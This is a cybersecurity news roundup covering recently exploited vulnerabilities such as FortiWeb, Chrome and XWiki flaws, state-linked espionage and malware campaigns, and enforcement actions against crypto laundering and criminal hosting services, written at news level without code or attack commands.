Fortinet has released security updates to address a FortiWeb zero-day vulnerability that attackers are already exploiting in the wild. The flaw, tracked as CVE-2025-58034, is a critical OS command injection issue, which allows authenticated threat actors to execute unauthorized code on affected FortiWeb web application firewall appliances. Administrators are strongly advised to upgrade their FortiWeb devices immediately to the latest software versions to prevent ongoing attacks.
Google has rolled out an emergency security update to address a zero-day vulnerability in the Chrome browser. This is the seventh Chrome zero-day flaw fixed by Google since the start of the year. Tracked as CVE-2025-13223, the flaw stems from a type-confusion issue within Chrome’s V8 JavaScript engine.
Cybersecurity company SonicWall released patches for a number of vulnerabilities in its products. One of the flaws is a SonicOS SSLVPN issue that can allow attackers to crash vulnerable firewalls. Tracked as CVE-2025-40601, the flaw is a stack-based buffer overflow impacting Gen8 and Gen7 (hardware and virtual) firewalls that can be utilized to perform denial-of-service attacks. Other two flaws (CVE-2025-40604, CVE-2025-40605) are RCE and path traversal bugs. Currently, there are no reports of these vulnerabilities being exploited in the wild, or that the PoC code for the flaws exists.
AhnLab SEcurity intelligence Center (ASEC) has published technical analysis of a ShadowPad malware campaign exploiting a remote code execution vulnerability in Microsoft Windows Server Update Services (WSUS), tracked as CVE-2025-59287.
A China-linked hacking group known as Autumn Dragon has been running a long-term espionage campaign against government and media organizations across Southeast Asia. The group mainly uses DLL sideloading to infiltrate systems and has recently increased its activity in countries around the South China Sea, including Indonesia, Singapore, the Philippines, Cambodia, and Laos. The attacks begin with an exploit for a WinRAR path-traversal vulnerability (CVE-2025-8088).
A new cyber-espionage campaign dubbed “Operation WrtHug” has compromised tens of thousands of ASUS routers worldwide. The operation, which appears to exclusively target ASUS WRT devices, mainly End-of-Life (EoL) models, uses known vulnerabilities to gain high-level control of the routers. Researchers say the attackers are exploiting a series of OS command injection vulnerabilities, including CVE-2023-41345, CVE-2023-41346, CVE-2023-41347, and CVE-2023-41348. The issues are collectively associated with CVE-2023-39780, an OS command injection flaw. Attackers also leveraged CVE-2024-12912 (an arbitrary command execution issue) and CVE-2025-2492 (an improper authentication control issue). Threat actors used the AiCloud service on ASUS devices as initial access point.
RondoDox is targeting unpatched XWiki servers via critical RCE flaw to incorporate more devices into its botnet. The said flaw (CVE-2025-24893) is a code injection issue in XWiki’s SolrSearch component, which allows unauthenticated users to execute arbitrary code by sending a crafted request. Although patches were released in February 2025, including versions 15.10.11, 16.4.1, and 16.5.0RC1, many servers remain unprotected.
Oligo Security reports that attackers are actively exploiting a two-year-old vulnerability in the Ray open-source AI framework (CVE-2023-48022) to compromise clusters using NVIDIA GPUs. The campaign, dubbed ShadowRay 2.0, uses the missing-authentication flaw to gain control of unprotected Ray instances. Once inside, attackers deploy XMRig to covertly mine cryptocurrency.
A new Mandiant report details TTPs observed in a targeted UNC1549 campaign against the aerospace, aviation, and defense industries in the Middle East.
China-linked APT24 has conducted a three-year espionage campaign using a new malware called ‘BadAudio.’ The malware has been delivered through spearphishing, supply-chain attacks, and watering-hole compromises. APT24 hijacked more than 20 legitimate public websites across multiple sectors, injecting JavaScript that targeted only Windows visitors. The injected script fingerprinted users and, when a visitor matched their criteria, displayed a fake software-update prompt to trick them into downloading the BadAudio malware.
A China-linked cyberespionage group known as PlushDaemon is hijacking software-update traffic using a network-level implant called ‘EdgeStepper.’ The tool is written in Golang and compiled as an ELF binary and designed to perform adversary-in-the-middle attacks. It intercepts DNS queries and checks whether they relate to software-update domains. If so, the query is rerouted to a malicious DNS node, which returns a link to a Windows downloader named ‘LittleDaemon,’ disguised as a benign DLL file. LittleDaemon then retrieves and launches a second-stage dropper called ‘DaemonicLogistics’ directly in memory.
Amazon’s threat intelligence team has warned of a new rising trend observed in nation-state actors it describes as cyber-enabled kinetic targeting, in which digital intrusions blend with physical operations. Threat actors hide their origins through anonymizing VPN networks, operate from controlled server infrastructure, and breach critical enterprise systems such as CCTV networks and maritime platforms. By streaming real-time data from compromised cameras and sensors, they gather live intelligence that can be used to adjust targeting in near real time.
The Iranian state-sponsored hacking group APT42 has expanded an espionage campaign aimed at senior defense and government officials. The campaign, dubbed “SpearSpecter,” relies on social engineering, with attackers spending days or even weeks building rapport through social media, public databases, and professional networks. INDA notes that the hackers often impersonate colleagues or contacts to lure victims into “exclusive” conferences or strategic meetings, sometimes extending the ruse through multiple WhatsApp conversations to build credibility.
A new campaign, dubbed “EVALUSION,” is leveraging the ClickFix social-engineering technique to deliver the Amatera Stealer and NetSupport RAT malware. The campaign tricks users into running malicious commands via the Windows Run dialog under the guise of completing a reCAPTCHA verification.
Acronis Threat Research Unit discovered a global malvertising and SEO-driven campaign called “TamperedChef.” It tricks users into downloading fake installers that look like common apps, through which hidden JavaScript remote control tools are installed. The attackers use social engineering, misleading ads, SEO, and abused digital certificates to appear trustworthy and avoid detection. The goals of the campaign are likely financially motivated, including establishing and selling remote access for profit, stealing valuable data (especially healthcare information), setting up systems for future ransomware attacks, and spying on high-value targets.
Hundreds of millions of dollars’ worth of cryptocurrency continued moving through major exchanges even after they paid hefty penalties and came under court-appointed supervision, according to a new international investigation. The International Consortium of Investigative Journalists (ICIJ) released The Coin Laundry, a report based on more than 10 months of work by reporters in 35 countries. Investigators collected hundreds of crypto wallet addresses linked to North Korean cybercrime groups, Russian money launderers and large-scale scam operations.
A new report from blockchain analytics firm Elliptic warns that sanctioned individuals, entities and even nation-states are increasingly turning to stablecoins to bypass global financial restrictions. The company found that sanctioned individuals increasingly rely on networks of OTC brokers and high-risk virtual asset service providers (VASPs) to convert fiat into stablecoins, move funds across borders and hide transaction origins. Red flags include sudden large stablecoin transfers from unregulated VASPs, exposure to wallets linked to sanctioned entities, and high-value trading with no believable business reason.
The United States, the UK, and Australia, imposed sanctions on several Russian bulletproof hosting providers accused of supporting ransomware gangs and other cybercriminal operations.
Investigators at the UK’s National Crime Agency say money from Britain’s local drug trade was funneled through a bank linked to Russian intelligence and the sanctioned defense sector. The probe, called ‘Operation Destabilise,’ found more links between two major Russian money-laundering networks (SMART and TGR) and a Bulgarian spy ring jailed earlier this year. The six spies, allegedly directed by fugitive ex-Wirecard executive Jan Marsalek, had gathered information for Russian intelligence. The laundering network was also used to buy Keremet Bank in Kyrgyzstan, which has been sanctioned by the US and UK for helping Russia evade trade sanctions.
Dutch law enforcement has taken offline the criminal hosting service known as CrazyRDP, seizing thousands of servers allegedly used to facilitate ransomware attacks, botnets, phishing schemes, and the distribution of child sexual abuse material (CSAM).
The US Justice Department announced five guilty pleas connected to a scheme that allowed North Korean IT workers to fraudulently secure remote jobs at American companies, generating more than $2.2 million for the sanctioned regime and affecting at least 136 US firms.
The founders of the Samourai Wallet cryptocurrency mixing service have been sent to prison for helping criminals launder over $237 million. CEO Keonne Rodriguez was given a five-year prison sentence, and CTO William Lonergan Hill got four years. After serving their sentences, both will be supervised for three more years and must each pay a $250,000 fine.
Major unlicensed streaming site Photocall has been shut down following a joint operation by the Alliance for Creativity and Entertainment and DAZN. The platform provided access to over 1,000 TV channels in 60 countries, including premium sports like MotoGP, the NFL, the NHL, and international tennis. It drew roughly 26 million visits a year, with most users coming from Spain, followed by Mexico, Germany, Italy, and the US.